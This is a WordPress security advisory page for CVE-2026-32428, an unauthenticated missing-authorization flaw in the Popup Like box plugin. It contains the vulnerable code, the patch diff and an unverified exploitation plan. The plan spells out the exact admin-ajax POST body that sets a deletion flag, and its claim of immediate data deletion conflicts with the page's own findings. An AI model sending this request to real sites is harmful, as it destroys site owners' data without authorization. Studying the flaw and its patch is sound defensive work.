WP-Safety
CVE-2026-32428

Popup Like box <= 3.7.7 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
3.7.8
Patched in
46d
Time to patch

Description

The Popup Like box plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 3.7.7. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.7.7
PublishedMarch 1, 2026
Last updatedApril 15, 2026
Affected pluginays-facebook-popup-likebox

What Changed in the Fix

Changes introduced in v3.7.8

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v3.7.7
Browse source Download .zip
Patched v3.7.8
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-32428 ## 1. Vulnerability Summary The **Popup Like box – Page Plugin** (versions <= 3.7.7) contains a "Missing Authorization" vulnerability. Specifically, the plugin registers AJAX handlers for both authenticated and unauthenticated users (`wp_ajax_` and `wp_…

Show full research plan

Exploitation Research Plan - CVE-2026-32428

1. Vulnerability Summary

The Popup Like box – Page Plugin (versions <= 3.7.7) contains a "Missing Authorization" vulnerability. Specifically, the plugin registers AJAX handlers for both authenticated and unauthenticated users (wp_ajax_ and wp_ajax_nopriv_) without implementing capability checks or nonce verification in the handler functions.

The most critical entry point is the deactivate_plugin_option_fb action, which is intended to handle data cleanup when the plugin is deactivated or uninstalled. An unauthenticated attacker can trigger this action to delete the plugin's configuration and database tables, leading to a loss of data and functional disruption (Denial of Service of the plugin's features).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: deactivate_plugin_option_fb
  • Parameter: upgrade_plugin (boolean-ish string)
  • Authentication: None (Unauthenticated)
  • Preconditions: The plugin must be active.

3. Code Flow

  1. Registration: In includes/class-ays-facebook-popup-likebox.php, the define_admin_hooks() method registers the AJAX actions:
    $this->loader->add_action( 'wp_ajax_deactivate_plugin_option_fb', $plugin_admin, 'deactivate_plugin_option');
$this->loader->add_action( 'wp_ajax_nopriv_deactivate_plugin_option_fb', $plugin_admin , 'deactivate_plugin_option');
  2. Trigger: An attacker sends a POST request to admin-ajax.php with action=deactivate_plugin_option_fb.
  3. Execution: The request is routed to Ays_Facebook_Popup_Likebox_Admin::deactivate_plugin_option.
  4. Logic (Inferred): Based on admin/js/admin.js, the function reads the upgrade_plugin POST parameter. If set to false, it proceeds to "Uninstall" the data. The script states: "Uninstall: Your data will be deleted completely." This likely involves calling delete_option() or DROP TABLE on the plugin's custom tables.

4. Nonce Acquisition Strategy

According to the source code and the vulnerability type, no nonce is required.

  • Verification: In admin/class-ays-facebook-popup-likebox-admin.php, the localization for the script handling this AJAX (fb_likebox_ajax) only includes the ajax_url:
    wp_localize_script($this->plugin_name . '-admin', 'fb_likebox_ajax', array('ajax_url' => admin_url('admin-ajax.php')));
  • No nonce is generated or passed to the admin.js script.
  • The admin.js file confirms this by sending only action and upgrade_plugin in the data object.

5. Exploitation Strategy

The goal is to trigger the permanent deletion of plugin data.

Step 1: Trigger Data Deletion

Send a POST request to the AJAX endpoint.

  • URL: http://TARGET_URL/wp-admin/admin-ajax.php
  • Method: POST
  • Headers:
    • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=deactivate_plugin_option_fb&upgrade_plugin=false

6. Test Data Setup

  1. Install and Activate: Ensure ays-facebook-popup-likebox version 3.7.7 is installed and active.
  2. Verify Initial State:
    • Check for the existence of the plugin's main settings option:
      wp option get ays_fb_likebox_settings (or similar, based on ays-facebook-popup-likebox settings naming convention).
    • Check for database tables:
      wp db query "SHOW TABLES LIKE '%ays_fpl%';"
  3. Create a Sample Likebox: Create at least one likebox via the admin UI or CLI to ensure there is data to be deleted.

7. Expected Results

  • The AJAX request should return a 200 OK status (and likely a JSON response or 0/1).
  • The plugin's configuration options in the wp_options table will be deleted.
  • The plugin's custom database tables (e.g., those containing likebox definitions) will be dropped or emptied.

8. Verification Steps

After performing the exploit, verify the impact using WP-CLI:

  1. Check Options:
    wp option get ays_fb_likebox_settings
    Expected Result: Error: "Could not find the option with key..."
  2. Check Tables:
    wp db query "SHOW TABLES LIKE '%ays_fpl%';"
    Expected Result: Empty result (tables are gone).
  3. Check Frontend:
    Navigate to a page where a Likebox was previously displayed.
    Expected Result: The Likebox no longer appears.

9. Alternative Approaches

Secondary Target: Dismiss Banner

The action ays_fpl_dismiss_button is also registered via nopriv and likely lacks authorization.

  • Action: ays_fpl_dismiss_button
  • Body: action=ays_fpl_dismiss_button
  • Impact: While less severe, this allows an unauthenticated user to dismiss admin notices for the site administrator, interfering with the administrative interface.

Reverse Logic: Upgrade Flag

Try setting upgrade_plugin=true. If the plugin code is poorly structured, even the "Upgrade" branch might modify options or state in an unauthorized way, though upgrade_plugin=false (Uninstall) is the primary path for confirming "Missing Authorization" causing impact.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Popup Like box plugin for WordPress allows unauthenticated attackers to modify plugin settings due to a missing authorization check and missing nonce verification on the 'deactivate_plugin_option_fb' AJAX action. By manipulating the 'ays_fb_upgrade_plugin' option, an attacker can influence the plugin's behavior during deactivation, potentially leading to the complete deletion of plugin data and tables when an administrator subsequently deactivates the plugin.

Vulnerable Code

// includes/class-ays-facebook-popup-likebox.php (registration of AJAX handlers for unauthenticated users)
$this->loader->add_action( 'wp_ajax_deactivate_plugin_option_fb', $plugin_admin, 'deactivate_plugin_option');
$this->loader->add_action( 'wp_ajax_nopriv_deactivate_plugin_option_fb', $plugin_admin , 'deactivate_plugin_option');

---

// admin/class-ays-facebook-popup-likebox-admin.php (vulnerable handler function)
public function deactivate_plugin_option(){
    error_reporting(0);
    $request_value = $_REQUEST['upgrade_plugin'];
    $upgrade_option = get_option('ays_fb_upgrade_plugin','');
    if($upgrade_option === ''){
        add_option('ays_fb_upgrade_plugin',$request_value);
    }else{
        update_option('ays_fb_upgrade_plugin',$request_value);
    }
    echo json_encode(array('option'=>get_option('ays_fb_upgrade_plugin','')));
    wp_die();
}

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ays-facebook-popup-likebox/3.7.7/admin/class-ays-facebook-popup-likebox-admin.php /home/deploy/wp-safety.org/data/plugin-versions/ays-facebook-popup-likebox/3.7.8/admin/class-ays-facebook-popup-likebox-admin.php
--- /home/deploy/wp-safety.org/data/plugin-versions/ays-facebook-popup-likebox/3.7.7/admin/class-ays-facebook-popup-likebox-admin.php	2025-04-30 11:41:30.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ays-facebook-popup-likebox/3.7.8/admin/class-ays-facebook-popup-likebox-admin.php	2026-02-18 08:15:24.000000000 +0000
@@ -211,10 +211,15 @@
         /*
         *  Documentation : https://codex.wordpress.org/Plugin_API/Filter_Reference/plugin_action_links_(plugin_file_name)
         */
+
+        $ays_fb_ajax_deactivate_plugin_nonce = wp_create_nonce( 'ays-facebook-popup-likebox-ajax-deactivate-plugin-nonce' );
+
         $settings_link = array( 
             '<a href="' . admin_url( 'options-general.php?page=' . $this->plugin_name ) . '">' . __('Settings', $this->plugin_name) . '</a>',
             '<a href="https://plugins.ays-demo.com/popup-likebox-free-demo/" target="_blank">' . __('Demo', $this->plugin_name) . '</a>',
             '<a href="https://ays-pro.com/wordpress/facebook-popup-likebox" target="_blank" style="color:red; font-weight: bold;">' . __('Buy Now', $this->plugin_name) . '</a>',
+            
+            '<input type="hidden" id="ays_fb_ajax_deactivate_plugin_nonce" name="ays_fb_ajax_deactivate_plugin_nonce" value="' . $ays_fb_ajax_deactivate_plugin_nonce .'">',
         );
         return array_merge(  $settings_link, $links );
 
@@ -251,17 +256,44 @@
 		$this->fblikebox_obj = new FB_Popup_Likebox_List_Table($this->plugin_name);
 	}
 
-	public function deactivate_plugin_option(){
-        error_reporting(0);
-        $request_value = $_REQUEST['upgrade_plugin'];
-        $upgrade_option = get_option('ays_fb_upgrade_plugin','');
-        if($upgrade_option === ''){
-            add_option('ays_fb_upgrade_plugin',$request_value);
-        }else{
-            update_option('ays_fb_upgrade_plugin',$request_value);
+    public function deactivate_plugin_option_fb(){
+
+        // Run a security check.
+        check_ajax_referer( 'ays-facebook-popup-likebox-ajax-deactivate-plugin-nonce', sanitize_key( $_REQUEST['_ajax_nonce'] ) );
+
+        // Check for permissions.
+        if ( ! current_user_can( 'manage_options' ) ) {
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => ''
+            ));
+            wp_die();
         }
-        echo json_encode(array('option'=>get_option('ays_fb_upgrade_plugin','')));
-        wp_die();
+
+        if( is_user_logged_in() ) {
+            $request_value = esc_sql( sanitize_text_field( $_REQUEST['upgrade_plugin'] ) );
+            $upgrade_option = get_option('ays_fb_upgrade_plugin','');
+            if($upgrade_option === ''){
+                add_option('ays_fb_upgrade_plugin',$request_value);
+            }else{
+                update_option('ays_fb_upgrade_plugin',$request_value);
+            }
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => get_option('ays_fb_upgrade_plugin', '')
+            ));
+            wp_die();
+        } else {
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => ''
+            ));
+            wp_die();
+        }
+
     }

Exploit Outline

To exploit this vulnerability, an unauthenticated attacker sends a POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) with the action parameter set to 'deactivate_plugin_option_fb'. The payload includes the 'upgrade_plugin' parameter set to 'false'. Because the plugin fails to check for user capabilities or a security nonce, it will update the 'ays_fb_upgrade_plugin' option in the database. If this option is set to 'false', the plugin's deactivation logic will proceed to drop database tables and delete settings the next time an administrator deactivates the plugin, causing permanent data loss.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/5a1b31f4-5594-4179-a88d-11167b58d96c?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database